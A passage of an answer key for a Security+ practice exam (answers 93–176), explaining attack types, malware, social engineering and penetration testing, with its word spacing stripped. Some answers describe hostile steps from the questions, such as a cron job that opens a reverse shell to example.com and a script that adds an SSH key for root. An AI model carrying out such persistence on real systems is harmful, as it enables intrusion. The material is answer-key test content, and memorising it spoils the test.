93. B. Aprivilegeescalationattackcanoccurhorizontally,whereattackersobtainsimilarlevelsofprivilegebutforotherusers,orverticallywheretheyobtainmoreadvancedrights.Inthiscase,Charleshasdiscoveredaverticalprivilegeescalationattackthathasallowedtheattackertoobtainadministrativerights.Cross-sitescriptingandSQLinjectionarebothcommontypesofwebapplicationattacks,andaraceconditionoccurswhendatacanbechangedbetweenwhenitischeckedandwhenitisused.

94. A. EviltwinattacksuseamaliciousaccesspointconfiguredtoappeartobeidenticaltoalegitimateAP.Attackerswaitfortheirtargetstoconnectviatheeviltwin,andcanthencaptureormodifytraffichowevertheywish.IPspoofingusestheIPaddressofasystemalreadyonthenetwork,Trojanhorsesaremalwarethatappeartobelegitimatesoftwareorfiles,andprivilegeescalationistheprocessofusingexploitstogainhigherprivileges.

95. A. Azero-dayexploitorattackoccursbeforethevendorhasknowledgeofit.Theremainderoftheanswersdon’taccuratelydescribeazero-dayattack—justbecauseithasnotyetbeenbreacheddoesnotmakeitazero-day,norisazero-daynecessarilyquicklyexploitable.Finally,azero-dayattackdoesnotspecifyhowlongtheattackermayhaveaccess.

96. D. PrependingisoneofthestrangertermsthatappearontheCompTIASecurity+examandisnotacommonlyusedphraseintheindustry.Thus,youneedtoknowthatwhenitisusedforthisexamitcanmeanoneofthreethings:addinganexpressionorphrasetoanemail,subjectline,orheaderstoeitherprotectorfoolusers.Theyalsonotethatitcanbeusedwhenaddingdataaspartofanattack,andthatsocialengineersmay“prepend”informationbyinsertingitintoconversationtogettargetstothinkaboutthingstheattackerwantsthemto.Pretexingisasocialengineeringtechniquewhereattackersuseareasonthatisintendedtobebelievabletothetargetforwhattheyaredoing.SQLinjectionisattemptstoaddSQLcodetoawebquerytogainadditionalaccessordata.PrependingisusedtocoverawidevarietyoftechniquesintheSecurity+examoutlinethatfocusonaddinginformationordatatoexistingcontent.

97. D. Althoughauditingsomelibrariesorlibrariesthatarecustom-developedforthecodeiscommon,auditingalllibrariesusedinthecodeisunlikelyexceptinexceptionalsituations.Theremainderofthesepracticesareallcommonlyusedwhenworkingwithoutsourcedcodedevelopmentteams.


98. C. DNSpoisoningoccurswhenfalseDNSinformationisinsertedintolegitimateDNSservers,resultingintrafficbeingredirectedtounwantedormalicioussites.Abackdoorprovidesaccesstothesystembycircumventingnormalauthentication.AnAPTisanadvancedpersistentthreat.ATrojanhorsetiesamaliciousprogramtoalegitimateprogram.

99. C. SpywareandadwarearebothcommonexamplesofaPUP,orpotentiallyunwantedprogram.ACATwasmadeupforthisquestionandisnotacommoncategorizationformalware,whereaswormsareself-spreadingmalwarethatoftenexploitvulnerabilitiestospreadviaanetwork.Trojanspretendtobelegitimatesoftwareorpairedwithlegitimatesoftwaretogainentrytoasystemordevice.

100. B. ATrojanhorsepretendstobelegitimatesoftware,andmayevenincludeit,butalsoincludesmalicioussoftwareaswell.Backdoors,RATs,andpolymorphicvirusesareallattacks,buttheydonotmatchwhatisdescribedinthequestionscenario.

101. A. AremoteaccessTrojan(RAT)ismalwarethatgivestheattackerremoteaccesstothevictimmachine.MacrovirusesoperateinsideofMicrosoftOfficefiles.Althoughabackdoorwillgiveaccess,itisusuallysomethinginthesystemputtherebyprogrammers,notintroducedbymalware.ARATisatypeofTrojanhorse,butaTrojanhorseismoregeneralthanwhatisdescribedinthescenario.Whenyouencounterquestionslikethisontheexam,youwillneedtoselectthebestanswer,notjustonethatmayanswerthequestion!

102. B. Cardcloningoftenoccursafteraskimmingattackisusedtocapturecarddata,whetherfromcreditcardsorentryaccesscards.Brute-forceandrainbowtable-basedattacksarebothusedagainstpasswords,whereasabirthdayattackisacryptographicattackoftenaimedatfindingtwomessagesthathashtothesamevalue.

103. B. Cross-siterequestforgery(XSRForCSRF)sendsforgedrequeststoawebsite,supposedlyfromatrusteduser.Cross-sitescripting(XSS)istheinjectionofscriptsintoawebsitetoexploittheusers.Abufferoverflowtriestoputmoredatainavariablethanthevariablecanhold.Aremote-accessTrojan(RAT)ismalwarethatgivestheattackeraccesstothesystem.

104. A. Adenial-of-service(DoS)attackmaytargetamemoryleak.Ifanattackercaninducethewebapplicationtogeneratethememoryleak,theneventuallythewebapplicationwillconsumeallmemoryonthewebserver


andthewebserverwillcrash.Backdoorsarenotcausedbymemoryleaks.SQLinjectionplacesmalformedSQLintotextboxes.Abufferoverflowattemptstoputmoredatainavariablethanitcanhold.

105. D. Thisisanexampleofanapplicationdistributeddenial-of-service(DDoS)attack,aimedatagamingapplication.AnetworkDDoSwouldbeaimedatnetworktechnology,eitherthedevicesorprotocolsthatunderlynetworks.Anoperationaltechnology(OT)DDoStargetsSCADA,ICS,utilityorsimilaroperationalsystems.AGDoSwasmadeupforthisquestion.

106. D. Purpleteamsareacombinationofredandblueteamsintendedtoleveragethetechniquesandtoolsfrombothsidestoimproveorganizationalsecurity.Aredteamisateamthattestssecuritybyusingtoolsandtechniqueslikeanactualattacker.Ablueteamisadefenderteamthatprotectsagainstattackers(andtesterslikeredteams!).Whiteteamsoverseecybersecuritycontestsandjudgeeventsbetweenredteamsandblueteams.

107. B. Thisisanexampleofransomware,whichdemandspaymenttoreturnyourdata.Arootkitprovidesaccesstoadministrator/rootprivileges.Alogicbombexecutesitsmaliciousactivitywhensomeconditionismet.Thisscenariodoesnotdescribewhaling.

108. D. Ifaccessisnothandledproperly,atimeofcheck/timeofuseconditioncanexistwherethememoryischecked,changed,thenused.Memoryleaksoccurwhenmemoryisallocatedbutnotdeallocated.Abufferoverflowiswhenmoredataisputintoavariablethanitcanhold.Anintegeroverflowoccurswhenanattemptismadetoputanintegerthatistoolargeintoavariable,suchastryingtoputa64-bitintegerintoa32-bitvariable.

109. B. Near-fieldcommunication(NFC)issusceptibletoanattackereavesdroppingonthesignal.TailgatingisaphysicalattackandnotaffectedbyNFCtechnology.BothIPspoofingandraceconditionsareunrelatedtoNFCtechnology.

110. B. FilelessvirusesoftentakeadvantageofPowerShelltoperformactionsoncetheyhaveusedavulnerabilityinabrowserorbrowserplug-intoinjectthemselvesintosystemmemory.Rick’sbestoptionfromthelistprovidedistoenablePowerShellloggingandthentoreviewthelogsonsystemshebelievesareinfected.Sincefilelessvirusesdon’tusefiles,animageofthediskisunlikelytoprovidemuchusefuldata.Disablingtheadministrativeuserwon’thaveanimpact,sincethecompromisewill


happeninsidetheaccountofwhicheveruserisloggedinandimpactedbythemalware.Crashdumpfilescouldhaveartifactsofthefilelessvirusifthemachinecrashedwhileitwasactive,butunlessthatoccurstheywillnothavethatinformation.

111. B. Tailgatinginvolvessimplyfollowingalegitimateuserthroughthedooroncetheyhaveopenedit,anditisacommonmeansofexploitingasmartcard-basedentryaccesssystem.Itissimplerandusuallyeasierthanattemptingtocaptureandcloneacard.Phishingisunrelatedtophysicalsecurity.Althoughitispossibletogenerateafakesmartcard,itisaveryuncommonattack.RFIDspoofingcanbeaccomplishedbutrequiresaccesstoavalidRFIDcardandisrelativelyuncommonaswell.

112. B. Adamshouldlookforoneormorethreatfeedsthatmatchthetypeofinformationheislookingfor.OpenthreatfeedsexistthattypicallyuseSTIXandTAXIItoencodeandtransferfeeddatatomultipletoolsinanopenformat.NoneoftheotherfeedtypesherewouldmeetAdam’sneeds.

113. B. MalicioustoolslikeBadUSBcanmakeaUSBcableordrivelooklikeakeyboardwhentheyarepluggedin.Somewhatstrangely,theSecurity+examoutlinefocusesonmaliciousUSBcables,butyoushouldbeawarethatmaliciousthumbdrivesarefarmorecommonandhavebeenusedbypenetrationtesterssimplybydroppingtheminaparkinglotneartheirintendedtarget.ATrojanorawormisapossibility,buttheclueinvolvingthekeyboardwouldpointtoaUSBdeviceasthefirstplaceNaomishouldlook.

114. D. Usingapass-the-hashattackrequiresattackerstoacquirealegitimatehash,andthenpresentittoaserverorservice.Arealhashwasprovided;itwasnotspoofed.Aneviltwinisawirelessattack.Shimmingisinsertingmaliciouscodebetweenanapplicationandalibrary.

115. B. Claimingtobefromtechsupportisclaimingauthority,andthestorythecallergaveindicatesurgency.Yes,thiscallerusedurgency(thevirusspread)butdidnotattemptintimidation.Authorityandtrustarecloselyrelated,andinthiscaseurgencywasthesecondmajorfactor.Thiscallerusedurgencybutnotintimidation.

116. B. ThequestionstellsusthattheseareWindows10systems,acurrentoperatingsystem.Fromthere,itissafetopresumethatsomethinghasgonewrongwiththepatchingprocessorthatthereisn’tapatchingprocess.Elaineshouldinvestigatebothwhattheprocessisandiftherearespecific


reasonsthesystemsarenotpatched.SinceweknowthesesystemsrunacurrentOS,optionA,unsupportedoperatingsystems,canberuledout.ThevulnerabilitiesarespecificallynotedtobeWindowsvulnerabilities,rulingoutoptionC,andthereisnomentionofprotocols,eliminatingoptionDaswell.

117. A. AddressResolutionProtocol(ARP)poisoning,oftencalledARPspoofing,occurswhenanattackersendsmaliciousARPpacketstothedefaultgatewayofalocalareanetwork,causingittochangethemappingsitmaintainsbetweenhardware(MAC)addressesandIPaddresses.InDNSpoisoning,domainnametoIPaddressentriesinaDNSserverarealtered.Thisattackdidnotinvolveanon-pathattack.Abackdoorprovidesaccesstotheattacker,whichcircumventsnormalauthentication.

118. A. Inaknownenvironment(white-box)test,thetesterisgivenextensiveknowledgeofthetargetnetwork.Fulldisclosureisnotatermusedtodescribetesting.Unknownenvironment(black-box)testinginvolvesonlyveryminimalinformationbeinggiventothetester.Aredteamtestsimulatesaparticulartypeofattacker,suchasanation-stateattacker,aninsider,orothertypeofattacker.

119. C. Socialengineeringisaboutusingpeopleskillstogetinformationyouwouldnototherwisehaveaccessto.Illegalcopyingofsoftwareisn’tsocialengineering,norisgatheringofdiscardedmanualsandprintouts,whichdescribesdumpsterdiving.Phishingemailsusesomesocialengineering,butthatisoneexampleofsocialengineering,notadefinition.

120. C. Shouldersurfinginvolvesliterallylookingoversomeone’sshoulderinapublicplaceandgatheringinformation,perhapsloginpasswords.ARPpoisoningalterstheAddressResolutionProtocoltablesintheswitch.Phishingisanattempttogatherinformation,oftenviaemail,ortoconvinceausertoclickalinkto,and/ordownload,anattachment.ASmurfattackisahistoricalformofdenial-of-serviceattack.

121. A. Invoicescamstypicallyeithersendlegitimateappearinginvoicestotrickanorganizationintopayingthefakeinvoice,ortheyfocusontrickingemployeesintologgingintoafakesitetoallowtheacquisitionofcredentials.Theytypicallydonotfocusondeliveryofmalwareorstealingcryptocurrency.

122. B. Vulnerabilityscansuseautomatedandsemiautomatedprocessestoidentifyknownvulnerabilities.Auditsusuallyinvolvedocumentchecks.


Unknownandknownenvironmenttestingarebothtypesofpenetrationtests.

123. A. Apartiallyknown(gray-box)testinvolvesthetesterbeinggivenpartialinformationaboutthenetwork.Aknownenvironment(white-box)testinvolvesthetesterbeinggivenfullornearlyfullinformationaboutthetargetnetwork,andunknown(black-box)environmentsdon’tprovideinformationaboutthetargetenvironment.Maskedisnotatestingterm.

124. D. Intheon-path(man-in-the-middle)attack,theattackerisbetweentheclientandtheserver,andtoeitherend,theattackerappearslikethelegitimateotherend.Thisdoesnotdescribeanydenial-of-serviceattack.Areplayattackinvolvesresendinglogininformation.Althoughanon-pathattackcanbeusedtoperformeavesdropping,inthisscenariothebestanswerisanon-pathattack.

125. A. Inaman-in-the-browserattack,themalwareinterceptscallsfromthebrowsertothesystem,suchassystemlibraries.On-pathattackinvolveshavingsomeprocessbetweenthetwoendsofcommunicationinordertocompromisepasswordsorcryptographykeys.Inabufferoverflowattack,moredataisputintoavariablethanthevariablewasintendedtohold.Sessionhijackinginvolvestakingoveranauthenticatedsession.

126. B. Uniformresourcelocator(URL)redirectionisfrequentlyusedinwebapplicationstodirectuserstoanotherserviceorportionofthesite.Ifthisredirectionisnotproperlysecured,itcanbeusedtoredirecttoanarbitraryuntrustedormalicioussite.Thisissue,knownasOpenRedirectvulnerabilities,remainsquitecommon.ThecodeshowndoesnotcontainSQLorLDAPcode,andthereisnomentionofchangingDNSinformationontheserver,thusmakingtheotheroptionsincorrect.

127. D. Placingalargerintegervalueintoasmallerintegervariableisanintegeroverflow.Memoryoverflowisnotatermused,andmemoryleakisaboutallocatingmemoryandnotdeallocatingit.Bufferoverflowsofteninvolvearrays.Variableoverflowisnotatermusedintheindustry.

128. B. Cross-siterequestforgery(XSRForCSRF)takesadvantageofthecookiesandURLparameterslegitimatesitesusetohelptrackandservetheirvisitors.InanXSRForaCSRFattack,attackersleverageauthorized,authenticatedusers’rightsbyprovidingthemwithacookieorsessiondatathatwillbereadandprocessedwhentheyvisitthetargetsite.Anattackermayembedalinkwithinanemailorotherlocationthatwillbeclickedor


executedbytheuseroranautomatedprocesswiththatuser’ssessionalreadyopen.ThisisnotSQLinjection,whichwouldattempttosendcommandstoadatabase,orLDAPinjection,whichgathersdatafromadirectoryserver.Cross-sitescripting(XSS)wouldembedcodeinuser-submittabledatafieldsthatawebsitewilldisplaytootherusers,causingittorun.

129. D. YouwillneedtobeabletoreadandunderstandbasicscriptsandprogramsinmultiplelanguagesfortheSecurity+exam.Inthisexample,youcanrecognizecommonBashsyntaxandseethatitisaddingakeytotheauthorizedkeysfileforroot.Ifthat’snotanexpectedscript,youshouldbeworried!

130. D. Rootkitsprovideadministrativeaccesstosystems,thusthe“root”inrootkit.ATrojanhorsecombinesmalwarewithalegitimateprogram.Alogicbombperformsitsmaliciousactivitywhensomeconditionismet.Amultipartitevirusinfectsthebootsectorandafile.

131. C. Memoryleakscancausecrashes,resultinginanoutage.ThistargetstheavailabilitylegoftheCIA(confidentiality,integrity,andavailability)triad,makingitasecurityissue.Memoryleaksdonotactuallyleaktootherlocations,nordotheyallowcodeinjection.Insteadmemoryleakscausememoryexhaustionorotherissuesovertimeasmemoryisnotproperlyreclaimed.

132. B. Thisquestioncombinestwopiecesofknowledge:howbotnetcommandandcontrolworks,andthatIRC’sdefaultportisTCP6667.Althoughthiscouldbeoneoftheotheranswers,themostlikelyanswergiventheinformationavailableisabotnetthatusesInternetRelayChat(IRC)asitscommand-and-controlchannel.

133. A. Softwareupdatesforconsumer-gradewirelessroutersaretypicallyappliedasfirmwareupdates,andSusanshouldrecommendthatthebusinessownerregularlyupgradetheirwirelessrouterfirmware.Ifupdatesarenotavailable,theymayneedtopurchaseanewrouterthatwillcontinuetoreceiveupdatesandconfigureitappropriately.Thisisnotadefaultconfigurationissuenoranunsecuredadministrativeaccount—neitherismentioned,norisencryption.

134. B. Radiofrequencyidentification(RFID)iscommonlyusedforaccessbadges,inventorysystems,andevenforidentifyingpetsusingimplantablechips.Inapenetrationtestingscenario,attackersaremostlikelytoattempt


toacquireorcloneRFID-basedaccessbadgestogainadmittancetoabuildingorofficesuite.

135. B. ThewordyouwillneedtoknowfortheSecurity+examforphishingviaSMSis“smishing,”atermthatcombinesSMSandphishing.BluejackingsendsunsolicitedmessagestoBluetoothdevices,andphonejackingandtextwhalingweremadeupforthisquestion.

136. B. Thisisvishing,orusingvoicecallsforphishing.Spearphishingistargetingasmall,specificgroup.Wardialingisdialingnumbershopingacomputermodemanswers.Robocallingisusedtoplaceunsolicitedtelemarketingcalls.

137. A. Wormsspreadthemselvesviavulnerabilities,makingthisanexampleofaworm.Avirusissoftwarethatself-replicates.Alogicbombexecutesitsmaliciousactivitywhensomeconditionismet.ATrojanhorsecombinesmalwarewithalegitimateprogram.

138. B. Dumpsterdivingistheprocessofgoingthroughthetrashtofinddocuments.Shreddingdocumentswillhelptopreventdumpsterdiving,buttrulydedicateddumpsterdiverscanreassembleevenwell-shreddeddocuments,leadingsomeorganizationstoburntheirmostsensitivedocumentsaftertheyhavebeenshredded.Phishingisoftendoneviaemailorphoneandisanattempttoelicitinformationorconvinceausertoclickalinkoropenanattachment.Shouldersurfingisliterallylookingoversomeone’sshoulder.Intheon-path(man-in-the-middle)attack,theattackerisbetweentheclientandtheserver,andtoeitherend,theattackerappearslikethelegitimateotherend.

139. B. Systemsshouldnothavearootkitonthemwhenapenetrationteststarts,androotkitsinstalledduringthetestshouldbefullyremovedandsecurelydeleted.Therestoftheoptionsarealltypicalpartsofapenetrationtestingcleanupprocess.Youcanreadmoreatthepenetrationtestingstandardsiteatwww.pentest-standard.org/index.php/Post_Exploitation.

140. C. Thisisanexampleofanonlinebrute-forcedictionaryattack.Dictionaryattacksusecommonpasswordsaswellascommonsubstitutionstoattempttobreakintoasystemorservice.Back-offalgorithmsthatlockoutattackersafterasmallnumberofincorrectpasswordattemptscanhelpsloworstopdictionaryattacksandotherbrute-forcepasswordattacks.Rainbowtablesaretablesofprecomputedhashes.Thebirthdayattackisa


http://www.pentest-standard.org/index.php/Post_Exploitation

methodforgeneratingcollisionsofhashes.Finally,nospoofingisindicatedinthisscenario.

141. C. Jimhasdiscoveredaskimmer,adeviceusedforskimmingattacksthatcapturecreditanddebitcardinformation.Skimmersmaybeabletowirelesslyuploadtheinformationtheycapture,ortheymayrequireattackerstoretrievedatainperson.SomeskimmersincludecamerastocapturekeypressesforPINsandotherdata.Areplayattackwouldreusecredentialsorotherinformationtoactlikealegitimateuser,araceconditionoccurswhenthetimeofuseandtimeofcheckofdatacanbeexploited,andacardclonerwouldbeusedaftercardswereskimmedtoduplicatethem.

142. D. Activereconnaissanceconnectstothenetworkusingtechniquessuchasportscanning.Bothactiveandpassivereconnaissancecanbedonemanuallyorwithtools.Black-boxandwhite-boxrefertotheamountofinformationthetesterisgiven.Attackersandtestersusebothtypesofreconnaissance.

143. D. BrowsertoolbarsaresometimesexamplesofPUPs,orpotentiallyunwantedprogramslikespywareoradware.Awormisatypeofmalwarethatspreadsonitsownbyexploitingvulnerabilitiesonnetwork-connectedsystems.Onceitinfectsasystem,itwilltypicallyscanforothervulnerablesystemsandcontinuetospread.ARATisaremote-accessTrojan,andarootkitisusedtogainandkeepadministrativeaccess.

144. B. OSINT,oropensourceintelligence,isintelligenceinformationobtainedfrompublicsourceslikesearchengines,websites,domainnameregistrars,andahostofotherlocations.OPSEC,oroperationalsecurity,referstohabitssuchasnotdisclosingunnecessaryinformation.STIXistheStructuredThreatIntelligenceExchangeprotocol,andIntConwasmadeupforthisquestion.

145. C. Wateringholeattackstargetgroupsbyfocusingoncommonsharedbehaviorslikevisitingspecificwebsites.Ifattackerscancompromisethesiteordelivertargetedattacksthroughit,theycanthentargetthatgroup.Watercooler,phishingnet,andphishpondattackswereallmadeupforthisquestion.

146. C. AlthoughStructuredQueryLanguage(SQL)queriesareoftenparameterized,LightweightDirectoryAccessProtocol(LDAP)securitypracticesfocusinsteadonuserinputvalidationandfilteringofoutputto


ensurethatanexcessiveamountofdataisnotbeingreturnedinqueries.Aswithallservices,securelyconfiguringLDAPservicesisoneofthefirstprotectionsthatshouldbeputinplace.

147. B. Althoughitmaysounddramatic,sitesaccessibleviaTororothertoolsthatseparatethemfromtherestoftheInternetaresometimescalled“thedarkweb.”TheSecurity+examusesthisterm,soyouneedtobeawareofitfortheexam.TherestoftheoptionsweremadeupandmaybealmostassillyascallingasectionoftheInternetthedarkweb.

148. B. URLredirectionhasmanylegitimateuses,fromredirectingtrafficfromno-longer-supportedlinkstocurrentreplacementstoURLshortening,butURLredirectionwascommonlyusedforphishingattacks.Modernbrowsersdisplaythefull,realURL,helpingtolimittheimpactofthistypeofattack.Certificateexpirationtrackingisusedtoensurethatwebsitecertificatesarecurrent,butitdoesnotpreventURLredirectionattacks.JavaScriptbeingenabledordisablingcookiesisnothelpfulforthispurposeeither.

149. A. Vulnerabilitiesincloudservicesrequireworkonthepartofthecloudserviceprovidertoremediatethem.Youcanremediatemostvulnerabilitiesinyourowninfrastructureyourselfwithoutathirdparty.Vulnerabilitiesincloudservicesandlocalinfrastructurecanbothbeassevereandtakeasmuchtimetoremediate.Regardlessofwhereyourorganizationstoresitsdata,yourresponsibilityforitislikelythesame!

150. C. Consumerwirelessroutersprovidelocaladministrativeaccessviatheirdefaultcredentials.Althoughtheyrecommendthatyouchangethepassword(andsometimestheusernameforgreatersecurity),manyinstallationsresultinanunsecuredadministrativeaccount.Theotheranswersareallcommonissuesbutnotwhatisdescribedinthequestion.

151. A. Aredteamisateamthattestssecuritybyusingtoolsandtechniqueslikeanactualattacker.Ablueteamisadefenderteamthatprotectsagainstattackers(andtesterslikeredteams!).Purpleteamsareacombinationofredandblueteamsintendedtoleveragethetechniquesandtoolsfrombothsidestoimproveorganizationalsecurity.Whiteteamsoverseecybersecuritycontestsandjudgeeventsbetweenredteamsandblueteams.

152. A. Directorytraversalattacksattempttoexploittoolsthatcanreaddirectoriesandfilesbymovingthroughthedirectorystructure.Theexamplewouldtrytoreadtheconfig.txtfilethreelayersabovethe


workingdirectoryofthewebapplicationitself.Addingcommondirectorynamesorcommonfilenamescanallowattackers(orpenetrationtesters)toreadotherfilesinaccessibledirectoriesiftheyarenotproperlysecured.Theremainderoftheoptionsweremadeupforthisquestion,althoughSlashdotisanactualwebsite.

153. A. Securityorchestration,automation,andresponse(SOAR)servicesaredesignedtointegratewithabroaderrangeofbothinternalandexternalapplications.Bothsecurityinformationandeventmanagement(SIEM)andSOARsystemstypicallyincludethreatandvulnerabilitymanagementtools,aswellassecurityoperations’automationcapabilities.

154. A. Aknownenvironment(white-box)testinvolvesprovidingextensiveinformation,asdescribedinthisscenario.Aknownenvironmenttestcouldbeinternalorexternal.Thisscenariodescribestheoppositeofanunknownenvironment(black-box)test,whichwouldinvolvezeroknowledge.Finally,threattestisnotatermusedinpenetrationtesting.

155. C. TheWindowsSecurityAccountManager(SAM)fileandthe/etc/shadowfileforLinuxsystemsbothcontainpasswordsandarepopulartargetsforofflinebrute-forceattacks.

156. C. AnSSLstrippingattackrequiresattackerstopersuadeavictimtosendtrafficthroughthemviaHTTPwhilecontinuingtosendHTTPSencryptedtraffictothelegitimateserverbypretendingtobethevictim.Thisisnotabrute-forceattack,aTrojanattackwouldrequiremalware,andadowngradeattackwouldtrytomovetheencryptedsessiontoalesssecureencryptionprotocol.

157. C. TheU.S.TrustedFoundryprogramisintendedtopreventsupplychainattacksbyensuringend-to-endsupplychainsecurityforimportantintegratedcircuitsandelectronics.

158. B. Threatmapslikethosefoundatthreatmap.fortiguard.comandthreatmap.checkpoint.comarevisualizationsofreal-timeornearreal-timedatagatheredbyvendorsandotherorganizationsthatcanhelpvisualizemajorthreatsandaidinanalysisofthem.Piechartsmaybedoneinrealtimeviasecurityinformationandeventmanagement(SIEM)orothersystems,butnotethatnoSIEMorotherdevicewasmentioned.Adarkwebtrackerwasmadeupforthequestion,andOSINTrepositorieswouldn’tshowreal-timedatalikethis.

159. B. BluesnarfinginvolvesaccessingdatafromaBluetoothdevicewhenit


http://threatmap.fortiguard.com

http://threatmap.checkpoint.com

isinrange.BluejackinginvolvessendingunsolicitedmessagestoBluetoothdeviceswhentheyareinrange.Eviltwinattacksusearogueaccesspointwhosenameissimilaroridenticaltothatofalegitimateaccesspoint.ARATisaremote-accessTrojan,andnothinginthisscenariopointstoaRATbeingthecauseofthestolendata.

160. B. Therulesofengagementforapenetrationtesttypicallyincludethetypeandscopeoftesting,clientcontactinformationandrequirementsforwhentheteamshouldbenotified,sensitivedatahandlingrequirements,anddetailsofregularstatusmeetingsandreports.

161. C. Thiscommandstartsareverseshellconnectingtoexample.comonport8989everyhour.Ifyou’renotfamiliarwithcron,youshouldtakeamomenttoreadthebasicsofcroncommandsandwhatyoucandowiththem—youcanreadamanpageforcronatmanpages.ubuntu.com/manpages/focal/man8/cron.8.html.

162. C. Thepenetrationtesterleveragedtheprincipleofurgencyandalsousedsomeelementsofauthoritybyclaimingtobeaseniormemberoftheorganization.Theydidn’tthreatenorintimidatethehelpdeskstaffmemberanddidnotmakesomethingseemscarce,nordidtheyattempttobuildtrustwiththestaffmember.

163. A. Proprietary,orclosedthreat,intelligenceisthreatintelligencethatisnotopenlyavailable.OSINT,oropensourcethreatintelligence,isfreelyavailable.ELINTisamilitarytermforelectronicandsignalsintelligence.Corporatethreatintelligencewasmadeupforthisquestion.

164. B. CompTIAdefines“maneuver”inthecontextofthreathuntingashowtothinklikeamalicioususertohelpyouidentifypotentialindicatorsofcompromiseinyourenvironment.OutsideoftheSecurity+exam,thisisnotacommonlyusedterminnormalsecuritypractice,althoughitdoesmakeanappearanceinmilitaryusage.SincethistermisnotcommonoutsideoftheSecurity+exam,makesureyouunderstandtheCompTIAdefinition.Intelligencefusionaddsmultipleintelligencesourcestogether,threatfeedsareusedtoprovideinformationaboutthreats,andadvisoriesandbulletinsareoftencombinedwiththreatfeedstounderstandnewattacks,vulnerabilities,andotherthreatinformation.

165. B. Scriptkiddiesaretheleastresourcedofthecommonthreatactorslistedabove.Ingeneral,theyflowfromnationalstateactorsasthemosthighlyresourced,toorganizedcrime,tohacktivists,toinsideactors,andthento


http://example.com

http://manpages.ubuntu.com/manpages/focal/man8/cron.8.html

scriptkiddiesastheleastcapableandleastresourcedactors.Aswithanyscalelikethis,thereisroomforsomevariabilitybetweenspecificactors,butfortheexam,youshouldtracktheminthatorder.

166. B. ASYNfloodisatypeofresourceexhaustionattackandusesupallavailablesessionsonthesystemitisaimedat.AlthoughaSYNfloodcanbeaDDoS,nomentionwasmadeofmultiplesourcemachinesfortheattack.Noapplicationwasmentioned,andaSYNfloodtargetstheTCP/IPstackonthesystemratherthananapplication.Novulnerabilitywasmentioned,andnoneisrequiredforaSYNflood,sinceitsimplytriestooverwhelmthetarget’sabilitytohandletheopenedconnections.ProtectionsagainstSYNfloodstendtofocusonpreventingopenedconnectionsfromcausingresourceexhaustionandidentifyingandblockingabusivehosts.

167. A. Pretextingisatypeofsocialengineeringthatinvolvesusingafalsemotiveandlyingtoobtaininformation.Here,thepenetrationtesterliedabouttheirroleandwhytheyarecalling(impersonation),andthenbuiltsometrustwiththeuserbeforeaskingforpersonalinformation.Awateringholeattackleveragesawebsitethatthetargetedusersalluseandplacesmalwareonittoachievetheirpurpose.PrependingisdescribedbyCompTIAas“addinganexpressionoraphrase,”andshouldersurfinginvolveslookingoveranindividual’sshoulderorotherwiseobservingthementeringsensitiveinformationlikepasswords.

168. C. Youmaybefamiliarwiththetermwardriving,butwarflyingisincreasinglycommonasdroneshaveenteredwideuse.Althoughpenetrationtestersaresomewhatunlikelytoflyahelicopterorairplaneoveratargetsite,inexpensivedronescanprovideusefulinsightintobothphysicalsecurityandwirelessnetworkcoverageifequippedwiththerighthardware.Droningandaerialsnoopingweremadeupforthisquestion,andAirSnarfisanoldtoolforcapturingusernamesandpasswordsonvulnerablewirelessnetworks.

169. C. Manyorganizationshavelegacyplatformsinplacethatcannotbepatchedorupgradedbutthatarestillanimportantpartoftheirbusiness.Securityprofessionalsareoftenaskedtosuggestwaystosecurethesystemswhileleavingthemoperational.CommonoptionsincludemovingthedevicestoanisolatedvirtualLAN(VLAN),disconnectingthedevicesfromthenetworkandensuringtheyarenotpluggedbackin,andusingafirewallorothersecuritydevicetoensurethatthelegacysystemisprotectedfrom


attacksandcannotbrowsetheInternetorperformotheractionsthatcouldresultincompromise.

170. B. AccordingtothenationalcouncilofISACs,informationsharingandanalysiscenters,“InformationSharingandAnalysisCenters(ISACs)helpcriticalinfrastructureownersandoperatorsprotecttheirfacilities,personnelandcustomersfromcyberandphysicalsecuritythreatsandotherhazards.ISACscollect,analyzeanddisseminateactionablethreatinformationtotheirmembersandprovidememberswithtoolstomitigaterisksandenhanceresiliency.”IRTsareincidentresponseteams,FeedburnerisGoogle’sRSSfeedmanagementtool,andverticalthreatfeedsisnotanindustryterm.

171. B. TCPport23istypicallyassociatedwithTelnet,anunencryptedremoteshellprotocol.SinceTelnetsendsitsauthenticationandothertrafficintheclear(clear/plaintext),itshouldnotbeused,andLuccashouldidentifythisasaconfigurationissueinvolvinganinsecureprotocol.

172. B. Privilegeescalationattacksfocusongainingadditionalprivileges.Inthiscase,Cameronusedphysicalaccesstothesystemtomodifyit,allowinghimtothenconductaprivilegeescalationattackasanunprivilegeduser.ATrojanwouldhaverequiredafiletoactlikeitwasdesirable,adenial-of-serviceattackwouldhavepreventedaccesstoasystemorservice,andswapfiles(orpagefiles)aredrivespaceusedtocontainthecontentsofmemorywhenmemoryrunslow.Swapfilesmaycontainsensitivedata,butthetermswapfileattackisnotcommonlyused.

173. C. CommonattributesofthreatactorsthatyoushouldbeabletodescribeandexplainfortheSecurity+examincludewhethertheyareinternalorexternalthreats,theirlevelofsophisticationorcapability,theirresourcesorfunding,andtheirintentormotivation.Thenumberofyearsofexperienceisdifficulttodetermineformanythreatactorsandisnotadirectwaytogaugetheircapabilities,andisthereforenotacommonattributethatisusedtoassessthem.

174. B. Althoughengagingdomainexpertsisoftenencouraged,requiringthird-partyreviewofproprietaryalgorithmsisnot.Manymachinelearningalgorithmsaresensitivesincetheyarepartofanorganization’scompetitiveadvantage.Ensuringthatdataissecureandofsufficientquality,ensuringasecuredevelopmentenvironment,andrequiringchangecontrolareallcommonartificialintelligence(AI)/machinelearning(ML)security


practices.

175. A. Whiteteamsactasjudgesandprovideoversightofcybersecurityexercisesandcompetitions.OptionsBandCmayremindyouofwhite-andgray-boxtests,butthey’reonlytheretoconfuseyou.Cybersecurityteamsareusuallyreferredtowithcolorslikered,blue,andpurpleasthemostcommoncolors,aswellasthewhiteteamsthattheSecurity+examoutlinementions.Defendersinanexercisearepartoftheblueteam.

176. C. Bugbountiesareincreasinglycommonandcanbequitelucrative.Bugbountywebsitesmatchvulnerabilityresearcherswithorganizationsthatarewillingtopayforinformationaboutissueswiththeirsoftwareorservices.Ransomsaresometimesdemandedbyattackers,butthisisnotaransomsinceitwasvoluntarilypaidaspartofarewardsystem.Azero-daydisclosurehappenswhenavulnerabilityisdisclosedandtheorganizationhasnotbeenpreviouslyinformedandallowedtofixtheissue.Finally,youmightfeellike$10,000isapayday,butthetermisnotusedasatechnicaltermanddoesn’tappearontheexam.

